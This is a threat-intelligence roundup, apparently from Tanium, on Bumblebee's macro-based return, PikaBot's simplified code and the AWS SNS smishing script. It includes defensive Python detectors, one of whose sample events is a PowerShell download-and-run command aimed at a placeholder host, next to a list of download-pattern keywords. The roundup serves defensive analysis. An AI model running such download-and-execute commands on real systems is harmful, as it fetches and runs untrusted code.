
CTI Roundup: Return of Bumblebee and PikaBot Malware, Spammers Hit AWS SNS

Bumblebee returns from hiatus, PikaBot reappears with optimized code, and threat actors distribute spam via AWS SNS

Emerging Issue

This week CTI investigates Bumblebee malware’s return to the threat landscape after a four-month hiatus. Next, CTI looks at PikaBot malware which has reemerged with significant changes to its code base and structure. Also included is a breakdown of how threat actors are using AWS Simple Notification Service (SNS) and a custom spam script called SNS Sender in an ongoing smishing campaign.

1. Bumblebee returns from hiatus

According to Proofpoint, Bumblebee malware has returned to the threat landscape after a brief hiatus. Before this campaign, which was observed on February 8, Bumblebee malware was absent from Proofpoint’s data for four months.

The latest campaign

In Bumblebee’s latest campaign, threat actors sent several thousand emails to various organizations across the U.S. with the subject, “Voicemail February.”

These emails were all sent from the same email address and contained OneDrive URLs. If the victim clicked on a OneDrive URL, they were led to a Word document that spoofed a consumer electronics company called Humane.

The Word document leveraged macros that create a script in the Windows temp directory. The macros would then execute the script via wscript.

Malware execution

The dropped temporary file contained a PowerShell command that is responsible for downloading and executing the next stage of the attack.

This next stage was another PowerShell command that was responsible for downloading and executing the Bumblebee DLL. The Bumblebee configuration in this campaign included a campaign ID of “dcc3” and an RC4 key of “NEW_BLACK.”
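The delivery chain above (Office document, script dropped in a Temp directory and run by wscript, PowerShell downloader) can be expressed as a process-tree check. This is an added example over constructed process-creation events, not Proofpoint's detection logic; the event fields, the `DOWNLOAD_HINTS` list and the sample command lines are assumptions.

```python
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# command-line fragments typical of a PowerShell download-and-run stage (assumed list)
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "iwr ", "invoke-expression", "iex ", "frombase64string")

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-cased (assumed telemetry schema)
    cmdline: str

def _runs_temp_script(cmdline):
    """True when a script host launches a .js/.vbs/.wsf file from a Temp directory."""
    low = cmdline.lower().rstrip('"')
    return "\\temp\\" in low and low.endswith((".js", ".vbs", ".wsf"))

def find_bumblebee_chains(events):
    """Return (office_pid, script_host_pid, powershell_pid) for each matching chain."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    chains = []
    for host in events:
        if host.image not in SCRIPT_HOSTS or not _runs_temp_script(host.cmdline):
            continue
        parent = by_pid.get(host.ppid)
        if parent is None or parent.image not in OFFICE_APPS:
            continue
        for child in children.get(host.pid, []):
            low = child.cmdline.lower()
            if child.image == "powershell.exe" and any(h in low for h in DOWNLOAD_HINTS):
                chains.append((parent.pid, host.pid, child.pid))
    return chains

# Constructed telemetry: one Bumblebee-style chain and one benign admin script run.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", '"WINWORD.EXE" /n "voicemail.docm"'),
    ProcEvent(300, 200, "wscript.exe", 'wscript.exe "C:\\Users\\a\\AppData\\Local\\Temp\\vm.js"'),
    ProcEvent(400, 300, "powershell.exe",
              "powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"),
    ProcEvent(500, 100, "wscript.exe", 'wscript.exe "C:\\Scripts\\inventory.vbs"'),
    ProcEvent(600, 500, "powershell.exe", "powershell -File C:\\Scripts\\report.ps1"),
]
```

The benign run (pid 500/600) is not flagged because its script lives outside Temp and its PowerShell child carries no download pattern.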

Noteworthy campaign features

What is interesting about this campaign is the use of VBA macro-enabled documents, which we are seeing less and less of ever since Microsoft started blocking macros by default.

Of the roughly 230 Bumblebee campaigns that Proofpoint has identified since March 2022, only five used macro-laden content: four relied on XL4 macros and just one on VBA macros.

Overall, the attack chain for this campaign is noticeably different than previous Bumblebee campaigns, even those that used the “NEW_BLACK” configuration.

Attribution

Proofpoint has not yet been able to attribute this latest Bumblebee malware activity to a particular threat actor. Researchers noticed that the lure theme surrounding voicemails, the use of OneDrive URLs, and the sender email address aligned with previous activity from TA579. However, Proofpoint was not able to definitively make that conclusion. Proofpoint mentions that Bumblebee malware can be used to deliver different follow-on payloads like ransomware, making it more difficult to attribute to a single actor.

Analyst comments from Tanium’s Cyber Threat Intelligence team

This is the first time we’ve reported on Bumblebee malware since it popped up last year. When malware returns from hiatus, it typically has new and improved functionality and TTPs. But this time, Bumblebee returned using a technique that many threat actors are moving away from.

The intent behind using this technique is not clear but nonetheless indicates that we may start seeing more Bumblebee activity.

2. PikaBot reappears with optimized code

Researchers have observed PikaBot malware in new campaigns with significant changes to its code base and structure.

PikaBot’s developers have reduced the complexity of the code, resulting in the removal of advanced obfuscation techniques and changes in network communications.

What is PikaBot?

  • PikaBot malware first emerged early in 2023. It consists of two main components including a loader and a core module.
  • The core module executes commands and injects payloads received from a C2 server. The malware uses distribution methods and behaviors similar to those of QBot malware.
  • After the FBI took down the QBot malware operation, there was a spike in PikaBot activity — most likely because a BlackBasta ransomware affiliate began replacing its use of QBot with PikaBot. PikaBot then seemed to cease activity at the end of December 2023.
  • Recent campaigns have been observed, indicating PikaBot’s return to the threat landscape. The latest variant has significant changes that reduce the complexity of the code. Zscaler believes this version is currently in a new development cycle and testing phase.

Anti-analysis technique

The most notable change to PikaBot’s anti-analysis techniques is its string obfuscation. Older PikaBot versions had each string obfuscated by combining the RC4 algorithm with AES-CBC, which was a very effective method. In the latest version, most strings are constructed by obtaining a character and pushing it onto the stack. Like previous variants, this variant also inserts junk code in between legitimate instructions.
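Strings built one character at a time on the stack can be recovered from a disassembly listing without running the sample. This is an added example over a constructed listing, not Zscaler's tooling or real PikaBot disassembly; it assumes Intel-syntax output with byte stores to `ebp`/`esp` slots and 32-bit `push` immediates, and it tolerates the junk instructions the text mentions between the stores.

```python
import re
import struct

# one byte per stack slot, e.g. "mov byte ptr [ebp-0x10], 0x4b"; or dword pushes before a call
BYTE_STORE = re.compile(r"^mov\s+byte ptr \[e[bs]p([+-])0x([0-9a-f]+)\],\s*0x([0-9a-f]{1,2})$", re.I)
PUSH_IMM = re.compile(r"^push\s+0x([0-9a-f]{1,8})$", re.I)

def printable_runs(buf, min_len):
    """Split a byte buffer on NULs/non-printables; keep ASCII runs of at least min_len."""
    return [r.decode("ascii") for r in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, buf)]

def recover_stack_strings(listing, min_len=4):
    slots = {}    # stack offset -> byte stored there; junk between stores is skipped
    pushes = []   # immediates in push order; a call terminates the sequence
    found = []
    for raw in listing.splitlines():
        line = raw.split(";", 1)[0].strip()            # drop trailing comments
        if m := BYTE_STORE.match(line):
            sign, off, val = m.groups()
            slots[int(off, 16) * (-1 if sign == "-" else 1)] = int(val, 16)
        elif m := PUSH_IMM.match(line):
            pushes.append(int(m.group(1), 16))
        elif line.lower().startswith("call") and pushes:
            # the last push lands at the lowest address, so reverse to get memory order
            buf = b"".join(struct.pack("<I", v) for v in reversed(pushes))
            found += printable_runs(buf, min_len)
            pushes.clear()
    if slots:   # stores may be interleaved with junk, so order by offset at the end
        found += printable_runs(bytes(slots[k] for k in sorted(slots)), min_len)
    return found

# Constructed listing in the new variant's style (not real PikaBot disassembly).
SAMPLE_LISTING = """
mov byte ptr [ebp-0x10], 0x4b   ; 'K'
xor eax, eax                    ; junk instruction between stores
mov byte ptr [ebp-0xf], 0x65    ; 'e'
mov byte ptr [ebp-0xe], 0x72    ; 'r'
mov byte ptr [ebp-0xd], 0x6e    ; 'n'
mov byte ptr [ebp-0xc], 0x65    ; 'e'
mov byte ptr [ebp-0xb], 0x6c    ; 'l'
mov byte ptr [ebp-0xa], 0x33    ; '3'
mov byte ptr [ebp-0x9], 0x32    ; '2'
mov byte ptr [ebp-0x8], 0x0     ; NUL terminator
push 0x6c                       ; trailing "l" plus zero padding (pushed first)
push 0x6c64746e                 ; "ntdl"
call 0x401000
"""
```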

In addition to these techniques, PikaBot uses two methods to detect a debugging session. It will read the BeingDebugged flag from the process environment block and will also call the Windows API function CheckRemoteDebuggerPresent.

It will continue to make these checks throughout various portions of its code. Similarly, the malware will leverage different methods to ensure it is not being run in a sandbox environment. Lastly, the malware will stop its execution if it detects either the Russian or Ukrainian language.

Bot initialization phase

The latest version of PikaBot stores all settings and information in one single structure. This configuration is stored in plaintext at a single address, which is much simpler than in previous versions, where each element had to be decrypted at runtime.

Once PikaBot has parsed the plaintext configuration, it erases it by setting all of its bytes to zero. The malware then loads the remaining required Windows API functions and generates a bot identifier for the host.

Network communications

The last phase of the malware involves reaching out to the C2 server to obtain various network commands. The network protocol for this has changed significantly in this latest PikaBot version. The malware will begin by registering the compromised host to its server and collecting information about the compromised host like monitor display settings, beacon and delay settings, and domain controller name.

It then appends three values to the registration packet: the 32-byte network RC4 key, an unknown registry key name, and the number of swap rounds used to encode the data. It encrypts the collected data and sends it with a POST request to the C2 server.

If the bot registration is successful, PikaBot will initiate an infinite loop to request and execute network commands. A full list of supported network commands is detailed in Zscaler’s report.

Analyst comments from Tanium’s Cyber Threat Intelligence team

The latest version of PikaBot malware takes a much different approach by decreasing the complexity of the code. This is unusual as new malware variants are usually more advanced and complex.

PikaBot still poses a significant threat and has previously been leveraged by threat actors that were known to distribute QBot malware.

3. Threat actors distribute spam via AWS SNS

Threat actors are now using AWS Simple Notification Service (SNS) along with a custom spam script called SNS Sender in an ongoing smishing campaign. The author behind the malicious script has been tied to numerous phishing kits on the market.

Campaign overview

SNS Sender is a custom Python script that uses AWS SNS to send bulk SMS messages containing phishing links. SentinelOne notes that SNS Sender is the first script that leverages AWS SNS in spamming attacks. The messages often impersonate USPS. What’s more, researchers have identified links between the creator of this tool and several other phishing kits but believe that this tool may still be in the testing phase.

About the script

The SNS Sender script needs a list of phishing links, links[.]txt, in its working directory in order to launch. It accepts several arguments as input including a text file of AWS access keys, secrets, and regions, a text file of phone numbers to target, a sender ID, and the message content itself.

The script has a function called “send_sns_message” that sets up an interface between the script and the AWS SNS backend to send the SMS messages. SentinelOne finds the inclusion of a sender ID variable an interesting choice, because the variable is optional and is not supported in all countries: U.S. carriers do not support sender IDs, for example, while they are mandatory in India. The messages in this campaign are often USPS-themed, which conflicts with the inclusion of a sender ID and could indicate that the threat actor behind the activity is located in a country where sender IDs are mandatory.

The script establishes a while loop to iterate through the list of AWS credentials and regions supplied as input. It replaces any instance of the string “linkas” in the message with a URL randomly selected from the links[.]txt file, weaponizing the message as a true phishing SMS.
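From the defender's side, the behaviour described above (one set of stolen keys cycling through regions and publishing SMS in bulk) leaves a distinctive footprint in the account's API logs. This is an added example over constructed CloudTrail-style records, not SentinelOne's work; the record layout, the `phoneNumber` request parameter and the thresholds are assumptions, and the access keys, phone number and account ID are fictitious.

```python
from collections import defaultdict
from datetime import datetime

def analyze_sns_publishes(records, window_s=300, min_calls=20, min_regions=2):
    """Return {accessKeyId: {...}} for keys that publish SMS directly to phone
    numbers at >= min_calls within window_s seconds, or from >= min_regions
    regions. Field names follow CloudTrail's layout but are assumed here."""
    per_key = defaultdict(list)
    for r in records:
        if r.get("eventSource") != "sns.amazonaws.com" or r.get("eventName") != "Publish":
            continue
        # direct-to-phone publishes (no topic) are the SMS path the spam tool uses
        if "phoneNumber" not in r.get("requestParameters", {}):
            continue
        ts = datetime.fromisoformat(r["eventTime"].replace("Z", "+00:00"))
        per_key[r["userIdentity"]["accessKeyId"]].append((ts, r["awsRegion"]))
    alerts = {}
    for key, calls in per_key.items():
        calls.sort()
        times = [t for t, _ in calls]
        regions = sorted({reg for _, reg in calls})
        burst, lo = False, 0
        for hi in range(len(times)):              # sliding window over sorted timestamps
            while (times[hi] - times[lo]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 >= min_calls:
                burst = True
                break
        if burst or len(regions) >= min_regions:
            alerts[key] = {"calls": len(calls), "regions": regions, "burst": burst}
    return alerts

def _rec(key, region, minute, phone=True):
    """Constructed CloudTrail-style record (all values fictitious)."""
    params = ({"phoneNumber": "+15555550100"} if phone
              else {"topicArn": "arn:aws:sns:us-east-1:123456789012:alerts"})
    return {"eventSource": "sns.amazonaws.com", "eventName": "Publish",
            "awsRegion": region, "eventTime": f"2024-02-15T10:{minute:02d}:00Z",
            "userIdentity": {"accessKeyId": key}, "requestParameters": params}

# 25 SMS publishes in five minutes from one key cycling three regions, plus two
# ordinary topic publishes from another key.
REGIONS = ["us-east-1", "eu-west-1", "ap-south-1"]
SAMPLE_RECORDS = (
    [_rec("AKIASTOLENKEY0EXAMPLE", REGIONS[i % 3], i % 5) for i in range(25)]
    + [_rec("AKIANORMALKEY0EXAMPLE", "us-east-1", 30, phone=False),
       _rec("AKIANORMALKEY0EXAMPLE", "us-east-1", 31, phone=False)]
)
```

Thresholds should be tuned to the account's normal SMS volume; an account that never sends SMS can alert on the first direct-to-phone publish.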

Phishing kits

The author behind the script goes by the alias of ARDUINO_DAS. Researchers identified more than 150 phishing kit files referencing this actor, more than half of which are USPS-themed.

Researchers dug into active campaigns from January 2024 that made use of USPS-themed phishing and discovered a basic flow. The landing pages tell the victim that their package could not be delivered and ask them to click a button for help. This button directs the victim to a tracking page that purports to show the package’s tracking details but also asks the victim to enter PII such as their name, phone number, and email address.

Next, the victim is led to another page that asks them to enter a credit card number to pay for a redelivery fee. The credit card number is forwarded to a card checker that is believed to be run via a Telegram service.

Analyst comments from Tanium’s Cyber Threat Intelligence team

As SentinelOne explains, threat actors do not typically use AWS SNS — even though they are increasingly leveraging the cloud in their attacks.

SNS Sender is a new approach requiring the actor to access a properly configured AWS SNS tenant. Further, its inclusion of a sender ID in a USPS-themed campaign is questionable and makes it likely that this tool is still under development.


Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.